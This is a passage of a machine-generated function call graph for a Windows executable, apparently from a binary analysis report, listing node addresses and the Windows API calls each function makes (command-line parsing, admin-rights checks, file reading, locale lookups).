18198->18199 18200 41f78e 18199->18200 18202 41cf06 __strnicoll 26 API calls 18200->18202 18201->18200 18202->18194 18203->18188 18205 41ba6c 18204->18205 18206 41ba5e 18204->18206 18207 41cfc3 __strnicoll 20 API calls 18205->18207 18206->18205 18211 41ba83 18206->18211 18208 41ba74 18207->18208 18209 41cf06 __strnicoll 26 API calls 18208->18209 18210 41ba7e 18209->18210 18210->17956 18211->18210 18212 41cfc3 __strnicoll 20 API calls 18211->18212 18212->18208 18217 41c398 18213->18217 18218 41c362 18213->18218 18214 41c3af 18216 41d8ba _free 20 API calls 18214->18216 18215 41d8ba _free 20 API calls 18215->18217 18216->18218 18217->18214 18217->18215 18218->17955 18521 41b670 18219->18521 18221 4066e5 GetTickCount 18222 4066fb 18221->18222 18271 4066f3 18221->18271 18223 406700 GetVersionExW 18222->18223 18224 40761c MessageBoxA 18223->18224 18225 40671f 18223->18225 18224->18271 18225->18224 18226 406739 18225->18226 18527 4114a2 18226->18527 18229 4114a2 22 API calls 18230 40675a 18229->18230 18231 4114a2 22 API calls 18230->18231 18232 406762 18231->18232 18530 406390 LoadLibraryA #17 18232->18530 18238 406784 18563 405174 18238->18563 18240 40678d 18575 40575f 18240->18575 18242 4067a3 18592 404435 18242->18592 18245 40575f 22 API calls 18246 4067b7 GetCommandLineW 18245->18246 18247 40575f 22 API calls 18246->18247 18248 4067c8 18247->18248 18595 404031 18248->18595 18250 4067e4 wsprintfW 18251 4067f4 18250->18251 18252 40575f 22 API calls 18251->18252 18253 40680b 18252->18253 18600 405c24 18253->18600 18256 405c24 3 API calls 18258 406862 18256->18258 18260 406874 18258->18260 18261 406868 18258->18261 18259 40682e 18259->18256 18263 405c24 3 API calls 18260->18263 18862 40648f 18261->18862 18264 40687f 18263->18264 18265 406892 18264->18265 18266 406885 18264->18266 18268 405c24 3 API calls 18265->18268 18878 401e60 18266->18878 18269 4068a2 18268->18269 18270 404031 22 API calls 18269->18270 18272 4068bf GetModuleFileNameW 18270->18272 18271->17575 18273 4068cb 18272->18273 18274 4068dc 18272->18274 18886 409afd 18273->18886 18276 405c24 3 API calls 18274->18276 18287 406900 18276->18287 18277 406ac4 18605 41156d 18277->18605 18279 406ad3 18280 41156d 22 API calls 18279->18280 18282 406ae2 18280->18282 18281 405c24 3 API calls 18292 406a5a 18281->18292 18283 406b72 18282->18283 18286 4115d4 22 API calls 18282->18286 18285 404435 2 API calls 18283->18285 18284 41b120 30 API calls 18288 406a0c 18284->18288 18289 406b93 18285->18289 18290 406b1f 18286->18290 18287->18271 18287->18277 18287->18288 18291 4069e0 18287->18291 18295 4018e1 RaiseException 18287->18295 18288->18281 18293 4115d4 22 API calls 18289->18293 18294 4115d4 22 API calls 18290->18294 18291->18271 18291->18284 18291->18288 18292->18277 18297 404cf6 RaiseException 18292->18297 18296 406b9e 18293->18296 18303 406b37 18294->18303 18295->18287 18609 401468 18296->18609 18299 406aa9 18297->18299 18299->18277 18304 41156d 22 API calls 18299->18304 18301 406bb2 18307 409afd 61 API calls 18301->18307 18302 406bcc 18615 41134d 18302->18615 18305 41156d 22 API calls 18303->18305 18304->18277 18308 406b62 18305->18308 18307->18271 18900 4041e0 18308->18900 18309 406bd4 18618 4049cf 18309->18618 18314 406bee 18314->18271 18315 406c83 18314->18315 18316 405c24 3 API calls 18314->18316 18315->18271 18318 406cd5 18315->18318 18319 406c9d wsprintfW 18315->18319 18325 40575f 22 API calls 18315->18325 18317 406c11 18316->18317 18317->18315 18323 406c19 18317->18323 18632 406080 18318->18632 18321 4041e0 46 API calls 18319->18321 18321->18315 18323->18271 18927 405f70 18323->18927 18325->18315 18326 406ce7 18326->18271 18667 4060a2 18326->18667 18332 409afd 61 API calls 18332->18271 18333 406d04 18334 4049cf 79 API calls 18333->18334 18335 406d1b 18334->18335 18336 4060a2 48 API calls 18335->18336 18337 406d23 18336->18337 18740 40149d 18337->18740 18339 406d2a 18340 40197d 75 API calls 18339->18340 18341 406d2f 18340->18341 18342 4060a2 48 API calls 18341->18342 18343 406d34 18342->18343 18344 406e72 18343->18344 18950 40493f AllocateAndInitializeSid 18343->18950 18756 40476f 18344->18756 18348 406d58 18350 4114a2 22 API calls 18348->18350 18351 406d60 18350->18351 18353 4114a2 22 API calls 18351->18353 18355 406d68 GetCommandLineW 18353->18355 18358 404cf6 RaiseException 18355->18358 18356 406f07 18360 40476f lstrcmpW 18356->18360 18357 406f68 CoInitialize 18363 40476f lstrcmpW 18357->18363 18362 406d78 18358->18362 18364 406f12 18360->18364 18361 406edb 18763 406323 18361->18763 18366 41146b 22 API calls 18362->18366 18367 406f8c 18363->18367 18368 406f21 18364->18368 18369 4041e0 46 API calls 18364->18369 18365 40575f 22 API calls 18370 406e84 18365->18370 18372 406d83 18366->18372 18373 406f9f 18367->18373 18377 4115d4 22 API calls 18367->18377 18982 407c4c 18368->18982 18369->18368 18370->18361 18370->18365 18378 40476f lstrcmpW 18370->18378 18759 41146b 18370->18759 18953 4116a4 18372->18953 18769 405f17 18373->18769 18377->18373 18378->18370 18382 40476f lstrcmpW 18384 406fb7 18382->18384 18386 406fc4 18384->18386 18388 41b120 30 API calls 18384->18388 18389 406fd3 18386->18389 18390 406fdd 18386->18390 18387 41167f 22 API calls 18391 406dbf 18387->18391 18388->18386 18997 409fe5 18389->18997 18394 406ff0 18390->18394 18395 406fe6 18390->18395 18961 41136f 18391->18961 18397 406dd0 18522 41b67c BuildCatchObjectHelperInternal 18521->18522 19210 41d7fe EnterCriticalSection 18522->19210 18524 41b687 pre_c_initialization 19211 41b6c7 18524->19211 18526 41b6bc __onexit 18526->18221 19215 419930 18527->19215 18531 4063b7 18530->18531 19235 40478c 18531->19235 18533 4063bc 18534 4041e0 46 API calls 18533->18534 18535 4063c3 18534->18535 18536 4041e0 46 API calls 18535->18536 18537 4063cf 18536->18537 18538 4041e0 46 API calls 18537->18538 18539 4063db 18538->18539 18540 4041e0 46 API calls 18539->18540 18541 4063e7 18540->18541 18542 4041e0 46 API calls 18541->18542 18543 4063f3 18542->18543 18544 4041e0 46 API calls 18543->18544 18545 4063ff 18544->18545 18546 4041e0 46 API calls 18545->18546 18552 40640b 18546->18552 18547 406423 SHGetSpecialFolderPathW 18548 406437 wsprintfW 18547->18548 18547->18552 18549 40575f 22 API calls 18548->18549 18549->18552 18550 40648a GetCommandLineW 18553 404cf6 18550->18553 18551 40575f 22 API calls 18551->18552 18552->18547 18552->18550 18552->18551 18555 404d0c 18553->18555 18556 404d4b 18553->18556 18554 404d3b 18559 4115d4 18554->18559 18555->18554 18557 4018e1 RaiseException 18555->18557 18556->18554 18558 4018e1 RaiseException 18556->18558 18557->18555 18558->18556 18560 4115e4 18559->18560 18561 419930 22 API calls 18560->18561 18562 411603 18560->18562 18561->18562 18562->18238 18564 4114a2 22 API calls 18563->18564 18574 405183 18564->18574 18565 41156d 22 API calls 18566 40528a 18565->18566 18566->18240 18567 4018e1 RaiseException 18567->18574 18568 40527c 18568->18565 18570 4114a2 22 API calls 18570->18574 18572 41156d 22 API calls 18572->18574 18574->18567 18574->18568 18574->18570 18574->18572 19242 41132c 18574->19242 19245 40582b 18574->19245 19251 411734 18574->19251 18576 4114a2 22 API calls 18575->18576 18577 40576d 18576->18577 18578 4114a2 22 API calls 18577->18578 18579 405775 18578->18579 18580 4115d4 22 API calls 18579->18580 18581 405780 18580->18581 18582 4115d4 22 API calls 18581->18582 18583 40578b 18582->18583 19265 4027db 18583->19265 18586 41146b 22 API calls 18587 4057ac 18586->18587 18589 411772 RaiseException 18587->18589 18588 4057c4 18588->18242 18590 4057b7 18589->18590 18591 40575f 22 API calls 18590->18591 18591->18588 19294 40440a GetProcAddress 18592->19294 18594 40443a 18594->18245 18596 41143a 22 API calls 18595->18596 18597 404045 18596->18597 18599 40405b 18597->18599 19297 411a4b 18597->19297 18599->18250 18601 405c39 18600->18601 18602 405c6b lstrlenW lstrlenW 18601->18602 18603 405c8c 18601->18603 19304 404e1f 18602->19304 18603->18259 18859 41b120 18603->18859 18606 41157b 18605->18606 18608 41159b 18605->18608 18607 419930 22 API calls 18606->18607 18606->18608 18607->18608 18608->18279 18610 401473 18609->18610 18613 401492 18610->18613 19316 4105ec 18610->19316 18613->18301 18613->18302 18616 419930 22 API calls 18615->18616 18617 41135a 18616->18617 18617->18309 18619 41134d 22 API calls 18618->18619 18620 4049df 18619->18620 18631 4105ec 3 API calls 18620->18631 18621 4049ee 19347 404a4a 18621->19347 18623 4049f8 18624 404a11 18623->18624 18626 404a03 18623->18626 18625 404a20 18624->18625 19378 40444d 18624->19378 18628 404a0b 18625->18628 19396 4114c6 18625->19396 18629 409afd 61 API calls 18626->18629 18628->18314 18629->18628 18631->18621 18633 4115d4 22 API calls 18632->18633 18634 406093 18633->18634 18635 411772 RaiseException 18634->18635 18636 40609d 18635->18636 18637 40197d 18636->18637 18638 4114a2 22 API calls 18637->18638 18639 401994 lstrlenW 18638->18639 18654 4019b3 18639->18654 18640 41146b 22 API calls 18642 401cc0 18640->18642 18641 40575f 22 API calls 18643 401d16 18641->18643 19531 4113b5 18642->19531 18645 41146b 22 API calls 18643->18645 18647 401d22 18645->18647 18646 401cd1 18648 4115d4 22 API calls 18646->18648 18649 4113b5 22 API calls 18647->18649 18653 401cdc 18648->18653 18651 401d36 18649->18651 18652 4115d4 22 API calls 18651->18652 18655 401d41 18652->18655 18653->18641 18656 404995 33 API calls 18654->18656 18657 41b120 30 API calls 18654->18657 18662 401c59 18654->18662 18665 401c94 18654->18665 18666 401c5f 18654->18666 19506 401914 18654->19506 18655->18326 18656->18654 18657->18654 18658 4114a2 22 API calls 18659 401c7c 18658->18659 18660 404cf6 RaiseException 18659->18660 18661 401c89 18660->18661 19528 40183b 18661->19528 19517 401d75 18662->19517 18665->18640 18665->18653 18666->18655 18666->18658 18666->18665 18668 40476f lstrcmpW 18667->18668 18669 4060b5 18668->18669 18670 406102 18669->18670 18671 4115d4 22 API calls 18669->18671 18672 40476f lstrcmpW 18670->18672 18673 4060cb 18671->18673 18674 40611e 18672->18674 18675 4041e0 46 API calls 18673->18675 18676 40476f lstrcmpW 18674->18676 18678 4060d2 18675->18678 18677 40613a 18676->18677 18679 40476f lstrcmpW 18677->18679 18680 411772 RaiseException 18678->18680 18681 406156 18679->18681 18682 4060db 18680->18682 18683 40476f lstrcmpW 18681->18683 18684 4115d4 22 API calls 18682->18684 18685 406172 18683->18685 18686 4060f2 18684->18686 18687 406199 18685->18687 18688 40617c lstrcmpiW 18685->18688 18689 4041e0 46 API calls 18686->18689 18690 40476f lstrcmpW 18687->18690 18688->18687 18691 4060f9 18689->18691 18692 4061a4 18690->18692 18693 411772 RaiseException 18691->18693 18694 40476f lstrcmpW 18692->18694 18693->18670 18695 4061c8 18694->18695 18696 4061d4 18695->18696 19558 40665d 18695->19558 18697 40476f lstrcmpW 18696->18697 18702 4061e7 18697->18702 18699 406205 18701 40476f lstrcmpW 18699->18701 18708 406217 18701->18708 18702->18699 18703 40476f lstrcmpW 18702->18703 19562 4065fa 18702->19562 18703->18702 18704 406235 18705 40476f lstrcmpW 18704->18705 18707 406240 18705->18707 18710 40476f lstrcmpW 18707->18710 18708->18704 18709 40476f lstrcmpW 18708->18709 19566 40662c 18708->19566 18709->18708 18711 406250 18710->18711 18712 40476f lstrcmpW 18711->18712 18713 406260 18712->18713 18714 40626d 18713->18714 18715 41b120 30 API calls 18713->18715 18716 40476f lstrcmpW 18714->18716 18715->18714 18717 40627e 18716->18717 18718 40628a 18717->18718 18719 41b120 30 API calls 18717->18719 18720 40476f lstrcmpW 18718->18720 18719->18718 18721 40629b 18720->18721 18722 40476f lstrcmpW 18721->18722 18723 4062b7 18722->18723 18724 40476f lstrcmpW 18723->18724 18725 4062d3 18724->18725 18726 40476f lstrcmpW 18725->18726 18727 4062ef 18726->18727 18728 40476f lstrcmpW 18727->18728 18729 40630b 18728->18729 18730 40631b 18729->18730 18731 4041e0 46 API calls 18729->18731 18732 4015a9 18730->18732 18731->18730 18733 4015b1 18732->18733 18734 4198f2 22 API calls 18733->18734 18737 4015f9 18733->18737 18735 4015bd 18734->18735 18738 4105ec 3 API calls 18735->18738 18736 4015e7 19574 40c9f9 18736->19574 18737->18333 18738->18736 18741 401589 collate 18740->18741 18742 4014b8 18740->18742 18741->18339 18742->18741 18743 4015a9 27 API calls 18742->18743 18744 4014ca 18743->18744 18744->18741 18745 419930 22 API calls 18744->18745 18746 4014f0 18745->18746 18746->18741 18748 40151a 18746->18748 19598 407aa0 18746->19598 18748->18741 18749 4198f2 22 API calls 18748->18749 18750 401528 18749->18750 18751 401538 18750->18751 19603 401180 18750->19603 18753 401544 GetTickCount 18751->18753 18754 401534 18751->18754 18755 401563 collate 18753->18755 18754->18751 18754->18753 18755->18741 18757 4040b5 lstrcmpW 18756->18757 18758 40477d 18757->18758 18758->18370 18760 41147a 18759->18760 18761 411ca9 22 API calls 18760->18761 18762 411485 18761->18762 18762->18370 18764 406377 18763->18764 18768 406334 18763->18768 18764->18356 18764->18357 18765 41143a 22 API calls 18765->18768 18768->18764 18768->18765 19639 405f4e 18768->19639 18770 403e7d 24 API calls 18769->18770 18771 405f24 18770->18771 18772 4053c8 22 API calls 18771->18772 18773 405f31 18772->18773 18774 40530d 22 API calls 18773->18774 18775 405f3c 18774->18775 18776 40553e 22 API calls 18775->18776 18777 405f42 18776->18777 18778 403e7d 24 API calls 18777->18778 18779 405f48 18778->18779 18779->18382 20365 41a918 18859->20365 18863 407c4c 24 API calls 18862->18863 18864 4064ab 18863->18864 18865 4041e0 46 API calls 18864->18865 18866 4064b9 18865->18866 18867 41146b 22 API calls 18866->18867 18868 4064c3 18867->18868 18869 4064f9 wsprintfW 18868->18869 18871 411772 RaiseException 18868->18871 20401 4117b3 18868->20401 18870 411772 RaiseException 18869->18870 18873 40652d 18870->18873 18871->18868 18874 411772 RaiseException 18873->18874 18875 40653a 18874->18875 18876 409c48 24 API calls 18875->18876 18877 40654f 18876->18877 18877->18271 18879 401e70 18878->18879 18885 401e87 18878->18885 18884 41b120 30 API calls 18879->18884 18879->18885 18880 4025a9 27 API calls 18881 401ec8 18880->18881 18882 401ed1 GetLastError 18881->18882 18883 401ed8 18881->18883 18882->18883 18883->18271 18884->18885 18885->18880 18887 4041e0 46 API calls 18886->18887 18888 409b11 wvsprintfW 18887->18888 18889 409b31 GetLastError FormatMessageW 18888->18889 18890 409be4 18888->18890 18891 409b76 lstrlenW lstrlenW 18889->18891 18892 409b5f FormatMessageW 18889->18892 18893 409e22 28 API calls 18890->18893 18894 419930 22 API calls 18891->18894 18892->18890 18892->18891 18896 409bf0 18893->18896 18895 409ba5 lstrcpyW lstrcpyW 18894->18895 20405 409e22 18895->20405 18896->18271 18898 409bd1 18899 409bd7 LocalFree 18898->18899 18899->18896 18901 4041f6 18900->18901 18902 404220 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 18901->18902 18906 404216 18901->18906 18903 4042ca SetLastError 18902->18903 18904 40425b 18902->18904 18905 4042e1 18903->18905 18903->18906 18907 419930 22 API calls 18904->18907 18908 404302 lstrlenA 18905->18908 18910 40478c 3 API calls 18905->18910 18923 411772 18906->18923 18909 40426f GetEnvironmentVariableW 18907->18909 18912 419930 22 API calls 18908->18912 18911 404287 GetLastError 18909->18911 18921 4042a3 collate 18909->18921 18913 4042f4 18910->18913 18914 40428d 18911->18914 18911->18921 18915 404323 18912->18915 18913->18908 18916 404297 lstrcmpiW 18914->18916 18914->18921 18917 404335 GetLocaleInfoW 18915->18917 18918 404379 MultiByteToWideChar 18915->18918 18916->18921 18919 404368 18917->18919 18920 40435c 18917->18920 18918->18906 18919->18918 18922 41b120 30 API calls 18920->18922 18921->18903 18922->18919 18924 411781 18923->18924 18925 4118be RaiseException 18924->18925 18926 41178c 18925->18926 18926->18283 20413 410130 18927->20413 18930 41134d 22 API calls 18932 40600c 18930->18932 18931 41146b 22 API calls 18936 405fad 18931->18936 18933 411516 22 API calls 18932->18933 18934 406019 18933->18934 18935 4116fa 22 API calls 18934->18935 18937 406026 18935->18937 18938 403769 87 API calls 18936->18938 18941 406053 18936->18941 18939 4116fa 22 API calls 18937->18939 18940 405fd5 18938->18940 18942 406033 18939->18942 18940->18941 18943 410130 2 API calls 18940->18943 18944 4100dc CloseHandle 18941->18944 18945 4116fa 22 API calls 18942->18945 18949 405ff3 18943->18949 18946 406075 18944->18946 18947 406040 18945->18947 18946->18271 18946->18332 20416 4106ea 18947->20416 18949->18930 18949->18941 18951 404992 18950->18951 18952 404978 CheckTokenMembership FreeSid 18950->18952 18951->18344 18951->18348 18952->18951 18954 4116b7 18953->18954 20432 4113f0 18954->20432 18956 406d9f 18957 41167f 18956->18957 18958 41168a 18957->18958 18959 4113f0 22 API calls 18958->18959 18960 406daf 18959->18960 18960->18387 18962 411ca9 22 API calls 18961->18962 18963 411388 18962->18963 18963->18397 18983 4114a2 22 API calls 18982->18983 18984 407c5d 18983->18984 18985 406f2f 18984->18985 18986 407c85 KiUserCallbackDispatcher GetSystemMetrics 18984->18986 18987 409c48 18985->18987 18986->18985 18988 409c57 18987->18988 18996 409c85 18987->18996 18989 41146b 22 API calls 18988->18989 18988->18996 18990 409c68 18989->18990 18991 41146b 22 API calls 18990->18991 18992 409c73 18991->18992 18993 405f4e 24 API calls 18992->18993 18994 409c7c 18993->18994 18995 405f4e 24 API calls 18994->18995 18995->18996 18996->18271 19210->18524 19214 41d846 LeaveCriticalSection 19211->19214 19213 41b6ce 19213->18526 19214->19213 19217 4198f2 19215->19217 19218 40674f 19217->19218 19219 41b5da __strnicoll 7 API calls 19217->19219 19221 419913 19217->19221 19225 41b91a 19217->19225 19218->18229 19219->19217 19220 41a477 19222 41795f __CxxThrowException@8 RaiseException 19220->19222 19221->19220 19232 41795f 19221->19232 19223 41a494 19222->19223 19231 41dfac __strnicoll 19225->19231 19226 41dfea 19228 41cfc3 __strnicoll 20 API calls 19226->19228 19227 41dfd5 RtlAllocateHeap 19229 41dfe8 19227->19229 19227->19231 19228->19229 19229->19217 19230 41b5da __strnicoll 7 API calls 19230->19231 19231->19226 19231->19227 19231->19230 19233 41797f RaiseException 19232->19233 19233->19220 19236 4047f6 19235->19236 19237 404798 GetUserDefaultUILanguage 19235->19237 19236->18533 19238 4047b5 19237->19238 19239 4047b9 GetSystemDefaultUILanguage 19237->19239 19238->18533 19240 4047c9 GetSystemDefaultLCID 19239->19240 19241 4047ef 19239->19241 19240->19236 19241->19236 19254 411c84 19242->19254 19246 4114a2 22 API calls 19245->19246 19247 40583b 19246->19247 19248 40586c 19247->19248 19249 404031 22 API calls 19247->19249 19248->18574 19250 405853 MultiByteToWideChar 19249->19250 19250->19248 19257 4118be 19251->19257 19253 411746 19253->18574 19255 419930 22 API calls 19254->19255 19256 411339 19255->19256 19256->18574 19258 4118d1 19257->19258 19259 4118e6 19257->19259 19261 411b03 19258->19261 19259->19253 19262 411b5d 19261->19262 19263 41795f __CxxThrowException@8 RaiseException 19262->19263 19264 411b72 19263->19264 19272 4198f2 19265->19272 19268 4027f7 19287 402808 19268->19287 19275 4198f7 19272->19275 19273 41b91a ___std_exception_copy 21 API calls 19273->19275 19274 4027e8 19274->19268 19282 40273a 19274->19282 19275->19273 19275->19274 19276 41b5da __strnicoll 7 API calls 19275->19276 19278 419913 19275->19278 19276->19275 19277 41a477 19279 41795f __CxxThrowException@8 RaiseException 19277->19279 19278->19277 19281 41795f __CxxThrowException@8 RaiseException 19278->19281 19280 41a494 19279->19280 19281->19277 19283 41143a 22 API calls 19282->19283 19284 40274a 19283->19284 19285 41143a 22 API calls 19284->19285 19286 402756 19285->19286 19286->19268 19290 403171 19287->19290 19289 402803 19289->18586 19289->18588 19291 40317c 19290->19291 19293 40319e 19290->19293 19292 419930 22 API calls 19291->19292 19292->19293 19293->19289 19295 404431 19294->19295 19296 404425 GetNativeSystemInfo 19294->19296 19295->18594 19296->18594 19298 411a91 19297->19298 19299 411a5e 19297->19299 19300 41795f __CxxThrowException@8 RaiseException 19298->19300 19301 419930 22 API calls 19299->19301 19302 411aa6 19300->19302 19303 411a75 19301->19303 19303->18599 19305 404e76 19304->19305 19306 404e30 19304->19306 19305->18603 19306->19305 19307 404d9a CharUpperW 19306->19307 19308 404e83 19306->19308 19307->19306 19312 404d9a 19308->19312 19311 404d9a CharUpperW 19311->19305 19313 404da6 19312->19313 19314 404dac 19312->19314 19313->19314 19315 404db7 CharUpperW 19313->19315 19314->19311 19315->19314 19317 401485 19316->19317 19318 4105fe 19316->19318 19322 410184 19317->19322 19325 410258 SetFilePointer 19318->19325 19332 4101e8 19322->19332 19326 410286 19325->19326 19327 41027c GetLastError 19325->19327 19328 41041f 19326->19328 19327->19326 19329 410428 19328->19329 19330 41042c GetLastError 19328->19330 19329->19317 19331 410438 19330->19331 19331->19317 19335 410195 19332->19335 19338 4100fb 19335->19338 19343 4100dc 19338->19343 19340 410106 19341 41012b 19340->19341 19342 41010a CreateFileW 19340->19342 19341->18613 19342->19341 19344 4100e4 CloseHandle 19343->19344 19345 4100f7 19343->19345 19346 4100f0 19344->19346 19345->19340 19346->19340 19346->19345 19348 40440a 2 API calls 19347->19348 19349 404a58 19348->19349 19350 41134d 22 API calls 19349->19350 19351 404a93 19350->19351 19352 41134d 22 API calls 19351->19352 19353 404a9b 19352->19353 19354 41134d 22 API calls 19353->19354 19355 404aa3 19354->19355 19400 4035e2 19355->19400 19360 4114c6 22 API calls 19369 404ae1 19360->19369 19361 404b45 19362 4035e2 24 API calls 19361->19362 19363 404b5e 19362->19363 19365 404ec3 29 API calls 19363->19365 19364 4035e2 24 API calls 19364->19369 19366 404b70 19365->19366 19435 4116c9 19366->19435 19367 404ec3 29 API calls 19367->19369 19369->19361 19369->19364 19369->19367 19371 4116c9 22 API calls 19369->19371 19438 4116fa 19369->19438 19371->19369 19372 4035e2 24 API calls 19374 404b92 19372->19374 19373 404ec3 29 API calls 19373->19374 19374->19372 19374->19373 19375 404bf7 19374->19375 19376 4116c9 22 API calls 19374->19376 19377 4116fa 22 API calls 19374->19377 19375->18623 19376->19374 19377->19374 19379 41134d 22 API calls 19378->19379 19388 404462 19379->19388 19380 4114a2 22 API calls 19380->19388 19382 40582b 23 API calls 19382->19388 19383 40474b 19490 40556d 19383->19490 19385 404739 19385->18625 19387 41156d 22 API calls 19387->19388 19388->19380 19388->19382 19388->19383 19388->19385 19388->19387 19389 405174 23 API calls 19388->19389 19391 4033a8 22 API calls 19388->19391 19392 4046c0 lstrlenW 19388->19392 19394 4027db 22 API calls 19388->19394 19395 4115d4 22 API calls 19388->19395 19477 404197 19388->19477 19482 403e09 19388->19482 19486 4040b5 19388->19486 19390 40468c lstrcmpW 19389->19390 19390->19388 19391->19388 19392->19388 19394->19388 19395->19388 19397 4114d4 19396->19397 19398 4114e7 19396->19398 19397->19398 19399 419930 22 API calls 19397->19399 19398->18628 19399->19398 19442 411516 19400->19442 19402 4035fa 19403 411516 22 API calls 19402->19403 19404 403609 19403->19404 19446 4112cd 19404->19446 19406 403617 19407 411516 22 API calls 19406->19407 19408 403621 19407->19408 19409 4112cd 22 API calls 19408->19409 19410 403638 19409->19410 19411 411516 22 API calls 19410->19411 19412 403642 19411->19412 19413 403682 19412->19413 19414 40365d wsprintfA 19412->19414 19415 403688 wsprintfA 19413->19415 19416 4036af 19413->19416 19418 4116fa 22 API calls 19414->19418 19419 4116fa 22 API calls 19415->19419 19417 4116fa 22 API calls 19416->19417 19420 4036bc 19417->19420 19421 403677 19418->19421 19422 4036a4 19419->19422 19423 4116fa 22 API calls 19420->19423 19424 4116fa 22 API calls 19421->19424 19425 4116fa 22 API calls 19422->19425 19426 4036c4 19423->19426 19424->19413 19425->19416 19427 404ec3 19426->19427 19428 404ed0 ___scrt_uninitialize_crt 19427->19428 19433 4105ec 3 API calls 19428->19433 19429 404ee2 lstrlenA lstrlenA 19431 404f1e BuildCatchObjectHelperInternal 19429->19431 19430 404ac4 19430->19360 19431->19430 19449 410586 19431->19449 19454 4033a8 19431->19454 19433->19429 19473 411891 19435->19473 19437 4116db 19437->19374 19437->19437 19439 41170c 19438->19439 19440 411891 22 API calls 19439->19440 19441 411719 19440->19441 19441->19369 19443 411528 19442->19443 19443->19443 19444 419930 22 API calls 19443->19444 19445 41153d 19443->19445 19444->19445 19445->19402 19447 411c84 22 API calls 19446->19447 19448 4112e8 19447->19448 19448->19406 19458 410235 19449->19458 19452 4105b4 GetLastError 19453 4105b0 19452->19453 19453->19431 19455 4033b6 19454->19455 19456 4033bb 19454->19456 19462 4118eb 19455->19462 19456->19431 19461 410208 ReadFile 19458->19461 19460 410254 19460->19452 19460->19453 19461->19460 19465 411aa7 19462->19465 19464 411901 19464->19456 19466 411ab7 19465->19466 19467 411aed 19465->19467 19466->19467 19468 411abf 19466->19468 19469 41795f __CxxThrowException@8 RaiseException 19467->19469 19470 419930 22 API calls 19468->19470 19471 411b02 19469->19471 19472 411ac8 19470->19472 19472->19464 19474 4118a4 19473->19474 19475 4118b9 19473->19475 19476 411aa7 22 API calls 19474->19476 19475->19437 19476->19475 19478 41134d 22 API calls 19477->19478 19479 4041a4 19478->19479 19480 4041d9 19479->19480 19481 4033a8 22 API calls 19479->19481 19480->19388 19481->19479 19483 403e43 19482->19483 19484 403e17 lstrcmpW 19482->19484 19483->19388 19485 403e2e 19484->19485 19485->19483 19485->19484 19487 4040c1 19486->19487 19488 4040c9 lstrcmpW 19487->19488 19489 4040e9 19487->19489 19488->19487 19488->19489 19489->19388 19491 405588 19490->19491 19492 40557c 19490->19492 19494 41134d 22 API calls 19491->19494 19505 40593b GetStdHandle WriteFile 19492->19505 19498 405592 19494->19498 19495 405583 19495->19385 19496 4055b7 19497 40582b 23 API calls 19496->19497 19499 4055c9 19497->19499 19498->19496 19502 4033a8 22 API calls 19498->19502 19500 4055d7 19499->19500 19501 4055eb 19499->19501 19503 409afd 61 API calls 19500->19503 19504 409afd 61 API calls 19501->19504 19502->19498 19503->19495 19504->19495 19505->19495 19507 41146b 22 API calls 19506->19507 19508 401927 19507->19508 19509 411772 RaiseException 19508->19509 19510 401934 19509->19510 19511 40195a 19510->19511 19513 4018e1 RaiseException 19510->19513 19512 411772 RaiseException 19511->19512 19514 401967 19512->19514 19513->19510 19515 401d75 71 API calls 19514->19515 19516 40196f 19515->19516 19516->18654 19520 401d8c 19517->19520 19527 401db8 19517->19527 19518 401d8f lstrlenW 19519 404e1f CharUpperW 19518->19519 19519->19520 19520->19518 19521 401dbf 19520->19521 19520->19527 19522 41146b 22 API calls 19521->19522 19526 401dc8 19522->19526 19525 40444d 68 API calls 19525->19527 19534 405873 19526->19534 19527->18666 19529 4115d4 22 API calls 19528->19529 19530 40184b 19529->19530 19530->18665 19555 411ca9 19531->19555 19533 4113d0 19533->18646 19535 41134d 22 API calls 19534->19535 19536 405883 19535->19536 19537 401e30 19536->19537 19540 403fe8 19536->19540 19537->19525 19539 4058a2 WideCharToMultiByte 19539->19537 19545 411304 19540->19545 19544 404012 _strncpy 19544->19539 19546 411c84 22 API calls 19545->19546 19547 403ffc 19546->19547 19547->19544 19548 4119ff 19547->19548 19549 411a12 19548->19549 19550 411a35 19548->19550 19551 419930 22 API calls 19549->19551 19552 41795f __CxxThrowException@8 RaiseException 19550->19552 19553 411a1b 19551->19553 19554 411a4a 19552->19554 19553->19544 19556 419930 22 API calls 19555->19556 19557 411ccd 19556->19557 19557->19533 19559 40667b 19558->19559 19570 406563 19559->19570 19563 406609 19562->19563 19564 406563 30 API calls 19563->19564 19565 406628 19564->19565 19565->18702 19567 40663a 19566->19567 19568 406563 30 API calls 19567->19568 19569 406659 19568->19569 19569->18708 19573 406584 19570->19573 19571 4065f3 19571->18696 19572 41b120 30 API calls 19572->19573 19573->19571 19573->19572 19575 40ca03 __EH_prolog 19574->19575 19578 40d2a6 19575->19578 19577 40ca6a 19577->18737 19579 40d2bb 19578->19579 19580 40d304 19579->19580 19583 4105ec 3 API calls 19579->19583 19580->19577 19581 40d2e2 19581->19580 19584 40d034 19581->19584 19583->19581 19591 4124a8 19584->19591 19586 40d062 19586->19580 19587 40d04c 19587->19586 19588 419930 22 API calls 19587->19588 19589 40d089 BuildCatchObjectHelperInternal 19588->19589 19589->19586 19590 4105ec 3 API calls 19589->19590 19590->19586 19594 41245e 19591->19594 19595 412470 19594->19595 19596 4124a1 19594->19596 19595->19596 19597 410586 2 API calls 19595->19597 19596->19587 19597->19595 19606 407a23 19598->19606 19601 407ac3 19601->18746 19602 407a23 24 API calls 19602->19601 19604 4198f2 22 API calls 19603->19604 19605 4011a0 19604->19605 19605->18754 19607 407a48 19606->19607 19610 41146b 22 API calls 19607->19610 19617 407a7e 19607->19617 19609 407a9b 19609->19601 19609->19602 19611 407a5e 19610->19611 19612 4114a2 22 API calls 19611->19612 19613 407a66 19612->19613 19618 411c0d 19613->19618 19615 407a71 19622 4125f3 19615->19622 19625 411ef2 19617->19625 19619 411c22 19618->19619 19619->19619 19620 419930 22 API calls 19619->19620 19621 411c45 19619->19621 19620->19621 19621->19615 19630 41260a 19622->19630 19626 411ef8 19625->19626 19627 411efb 19625->19627 19626->19609 19635 411f88 19627->19635 19629 411f01 19629->19609 19634 412618 19630->19634 19631 412606 19631->19617 19632 41260a CharUpperW 19632->19634 19633 404d9a CharUpperW 19633->19634 19634->19631 19634->19632 19634->19633 19638 411f98 19635->19638 19636 411fb6 VariantClear 19636->19629 19637 411fce 19637->19629 19638->19636 19638->19637 19640 403e7d 24 API calls 19639->19640 19641 405f59 19640->19641 19716 405483 19641->19716 19717 4114a2 22 API calls 19716->19717 19718 405491 19717->19718 19719 41156d 22 API calls 19718->19719 19720 40549c 19719->19720 19721 411772 RaiseException 19720->19721 19722 